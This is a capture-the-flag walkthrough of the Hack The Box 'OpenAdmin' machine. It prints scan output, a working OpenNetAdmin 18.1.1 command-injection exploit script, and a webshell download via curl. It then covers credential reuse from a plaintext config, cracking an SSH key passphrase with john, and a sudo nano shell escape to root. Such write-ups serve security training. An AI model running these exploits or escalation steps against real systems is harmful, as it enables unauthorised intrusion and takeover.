Using AutoRecon I'll map the ports/services running on the VM.

sudo ~/tools/AutoRecon/ --single-target
[*] Scanning target
[*] Running service detection nmap-full-tcp on
[*] Running service detection nmap-top-20-udp on
[*] Running service detection nmap-quick on
[*] Service detection nmap-quick on finished successfully in 10 seconds
[*] Found ssh on tcp/22 on target
[*] Found http on tcp/80 on target
[*] Running task tcp/22/sslscan on
[*] Running task tcp/22/nmap-ssh on
[*] Running task tcp/80/sslscan on
[*] Running task tcp/80/nmap-http on
[*] Running task tcp/80/curl-index on
[*] Running task tcp/80/curl-robots on
[*] Running task tcp/80/wkhtmltoimage on
[*] Running task tcp/80/whatweb on
[*] Task tcp/22/sslscan on finished successfully in less than a second
[*] Task tcp/80/sslscan on finished successfully in less than a second
[*] Running task tcp/80/nikto on
[*] Running task tcp/80/gobuster on
[*] Task tcp/80/wkhtmltoimage on finished successfully in less than a second
[*] Task tcp/80/curl-robots on finished successfully in less than a second
[*] Task tcp/80/curl-index on finished successfully in less than a second
[!] Task tcp/80/gobuster on returned non-zero exit code: 1
[*] Task tcp/22/nmap-ssh on finished successfully in 3 seconds
[*] Task tcp/80/whatweb on finished successfully in 3 seconds
[*] Service detection nmap-top-20-udp on finished successfully in 19 seconds
[*] Task tcp/80/nmap-http on finished successfully in 26 seconds
[*] Service detection nmap-full-tcp on finished successfully in 48 seconds
[*] [11:48:15] - There is 1 task still running on
[*] [11:49:15] - There is 1 task still running on
[*] [11:50:15] - There is 1 task still running on
[*] [11:51:15] - There is 1 task still running on
[*] [11:52:15] - There is 1 task still running on
[*] [11:53:15] - There is 1 task still running on
[*] [11:54:16] - There is 1 task still running on
[*] Task tcp/80/nikto on finished successfully in 7 minutes, 14 seconds
[*] Finished scanning target in 7 minutes, 24 seconds
[*] Finished scanning all targets in 7 minutes, 25 seconds!

Nmap TCP results

# Nmap 7.80 scan initiated Tue Mar 10 11:47:16 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Desktop/HackTheBox/HackTheBox/machines/openadmin/scans/results/scans/_full_tcp_nmap.txt -oX /home/kali/Desktop/HackTheBox/HackTheBox/machines/openadmin/scans/results/scans/xml/_full_tcp_nmap.xml
Nmap scan report for
Host is up, received user-set (0.046s latency).
Scanned at 2020-03-10 11:47:16 EDT for 47s
Not shown: 65533 closed ports
Reason: 65533 resets
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Adtran 424RG FTTH gateway (92%)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Uptime guess: 14.909 days (since Mon Feb 24 12:58:57 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
1   45.48 ms
2   45.75 ms

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
# Nmap done at Tue Mar 10 11:48:03 2020 -- 1 IP address (1 host up) scanned in 48.07 seconds

WhatWeb results:

WhatWeb report for
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        :
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and 
    maintain an open-source HTTP server for modern operating 
    systems including UNIX and Windows NT. The goal of this 
    project is to provide a secure, efficient and extensible 
    server that provides HTTP services in sync with the current 
    HTTP standards. 

    Version      : 2.4.29 (from HTTP Server Header)
    Google Dorks: (3)
    Website     :

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to 
    identify the operating system from the server header. 

    OS           : Ubuntu Linux
    String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Tue, 10 Mar 2020 15:47:57 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
    ETag: "2aa6-597dbd5dcea8b-gzip"
    Accept-Ranges: bytes
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 3138
    Connection: close
    Content-Type: text/html

Nikto results:

- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2020-03-10 11:47:26 (GMT-4)
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 597dbd5dcea8b, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-03-10 11:54:40 (GMT-4) (434 seconds)
+ 1 host(s) tested

Using dirsearch to enumerate hidden directory

kali@kali:~/tools/dirsearch$ ./ -u -ephp,bak,ini,zip -x403

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, bak, ini, zip | HTTP method: get | Threads: 10 | Wordlist size: 7208

Error Log: /home/kali/tools/dirsearch/logs/errors-20-02-27_05-31-51.log


[05:31:51] Starting: 
[05:32:38] 200 -   11KB - /index.html
[05:32:46] 301 -  312B  - /music  ->

Task Completed

The webserver on the / is not configured, connecting to the returns the fresh installed apache landing page. Dirsearch revealed there is another path, /music we will explore now.


Some links are not working, the most interesting is the login link that open an unprotected guest account of a OpenAdmin installation screenshot-music-site.png|300,300

we can observe the OpenNetAdmin version is 18.1.1

After the recognition phase we know that whe have the following software/services:

OpenSSH 7.6p1
Apache 2.4.29
OpenNetAdmin 18.1.1


looking at the ExploitDB we found some exploit:

root@kali:~# searchsploit apache 2.4
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting                                             | exploits/unix/remote/
Apache 2.4.17 - Denial of Service                                                                             | exploits/windows/dos/39037.php
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation                         | exploits/linux/local/46676.php
Apache 2.4.23 mod_http2 - Denial of Service                                                                   | exploits/linux/dos/
Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution                               | exploits/php/remote/40142.php
Apache 2.4.7 mod_status - Scoreboard Handling Race Condition                                                  | exploits/linux/dos/34133.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                              | exploits/linux/webapps/
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree                                            | exploits/multiple/remote/21492.txt
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure                                               | exploits/multiple/remote/21490.txt
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure                                       | exploits/multiple/remote/21491.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# searchsploit openssh 7
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service                                            | exploits/multiple/dos/
FreeBSD OpenSSH 3.5p1 - Remote Command Execution                                                              | exploits/freebsd/remote/17462.txt
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                      | exploits/linux/remote/
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                | exploits/linux/remote/
OpenSSH 3.x - Challenge-Response Buffer Overflow (1)                                                          | exploits/unix/remote/21578.txt
OpenSSH 3.x - Challenge-Response Buffer Overflow (2)                                                          | exploits/unix/remote/21579.txt
OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation                                                          | exploits/linux/local/41173.c
OpenSSH 7.2 - Denial of Service                                                                               | exploits/linux/dos/
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection                                                       | exploits/multiple/remote/
OpenSSH 7.2p2 - Username Enumeration                                                                          | exploits/linux/remote/
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation          | exploits/linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                      | exploits/linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                          | exploits/linux/remote/
OpenSSHd 7.2p2 - Username Enumeration                                                                         | exploits/linux/remote/40113.txt
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~# searchsploit opennetadmin 
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                 | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                  | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                   | exploits/php/webapps/
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The options are:

  • Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation (aka Carpe diem)

  • OpenSSH 2.3 < 7.7 - Username Enumeration

  • OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)

  • OpenNetAdmin 18.1.1 - Remote Code Execution

The first one is a local privilege escalation exploit, maybe we could us it later.

The Openssh vulnerability could be useful to check usernames.

I don't check these two vulnerabilities right now, I'm focusing on the OpenNetAdmin vulnerability.

This is the exploit:

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage:
# Software Link:
# Version: v18.1.1
# Tested on: Linux


while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

It injects the command in the POST request and shows some results. The script works and I upload a webshell in the apache's document root.

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin$ bash 
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
$ curl -O myShell.php     

The WebShell! I've a foot inside. webshell.png

It is possible to look at some sensible files
/etc/passwd webshell.png

There are only two users with a shell defined, so they are the only users that can using interactive shells:


Exploring the FS I found an interesting file: webshell.png

credentials for a DB connection, it seems.


$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',


Password reuse is a very common scenario, so I try the password found with the users found in the /etc/passwd file.

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin$ ssh joanna@
joanna@'s password: 
Permission denied, please try again.
joanna@'s password: 

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin$ ssh jimmy@
jimmy@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Wed Mar 11 00:04:47 UTC 2020

  System load:  0.0               Processes:             112
  Usage of /:   49.3% of 7.81GB   Users logged in:       0
  Memory usage: 18%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Last login: Thu Jan  2 20:50:03 2020 from

Again, a password reuse case. Looking for the files owned by the user jimmy I found:


The apache configuration show an internal facing website, accessible only from within the VM.

jimmy@openadmin:/etc/apache2/sites-enabled$ ls
internal.conf  openadmin.conf
jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf 

    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined


This webserver will run as the joanna user.

Looking inside the /var/www/internal directory I found some credentials hardcoded inside the index.php file

            $msg = '';

            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';

The main.php file also shows interesting things:

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

It will be possible to get the joanna user private SSH key! Using a simple curl:

jimmy@openadmin:/var/www/internal$ curl
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

I copied the key in a file, in the /tmp directory, then I try to connect to the system as the joanna user

jimmy@openadmin:/tmp$ chmod 600 joanna-private-key 
jimmy@openadmin:/tmp$ ssh -i joanna-private-key joanna@0
The authenticity of host '0 (' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '0,' (ECDSA) to the list of known hosts.
Enter passphrase for key 'joanna-private-key': 


The key is protected by a passphrase, so I try to crack it.

kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin/loots$ /usr/share/john/ joanna-priv-key > joanna-priv-key-hash
kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin/loots$ cat joanna-priv-key-hash 
kali@kali:~/Desktop/HackTheBox/HackTheBox/machines/openadmin/loots$ /usr/sbin/john joanna-priv-key-hash  -wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna-priv-key)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2020-03-11 06:03) 0.2132g/s 3057Kp/s 3057Kc/s 3057KC/sa6_123..*7¡Vamos!
Session completed

The key passphrase is bloodninjas So I can connect as the joanna user and find the USER flag:

jimmy@openadmin:/tmp$ ssh -i joanna-private-key joanna@0
Enter passphrase for key 'joanna-private-key': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Wed Mar 11 10:06:30 UTC 2020

  System load:  0.0               Processes:             112
  Usage of /:   49.6% of 7.81GB   Users logged in:       1
  Memory usage: 27%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from
joanna@openadmin:~$ ls
joanna@openadmin:~$ cat user.txt 

Now we have to check how do a privilege escalation, we need to find the root flag. I found, in the reconnaissance phase, a vulnerability in the Apache web server that can lead to a privilege escalation. Anyway we can't user that vulnerability, we have to rely on the log rotate and we can't force it as joanna user. Doing a recognition as joanna user, to find something useful. I found the joanna user is on the sudoers allowed users:

joanna@openadmin:~$ ls -la /etc/sudoers.d/joanna 
-rw-r--r-- 1 root root 46 Nov 22 23:50 /etc/sudoers.d/joanna
joanna@openadmin:~$ cat /etc/sudoers.d/joanna 
joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv

Privilege Escalation

The joanna users can run /bin/nano as user when edit /opt/private. So basically we run the command, open the root home and find & show the flag

joanna@openadmin:~$ sudo /bin/nano /opt/priv



The root flag is 2f907ed450b361b2c2bf4e8795d5b561

We can also have a root shell, using nano. When the nano interface has been opened using the ^R^X (control-R and then control-X) keys it is possible to issue a command. So using the command

reset; sh 1>&0 2>&0

we obtain a root shell rootshell1.png


- lilloX

Share on: Diaspora*TwitterFacebookLinkedInHackerNewsEmailReddit


comments powered by Disqus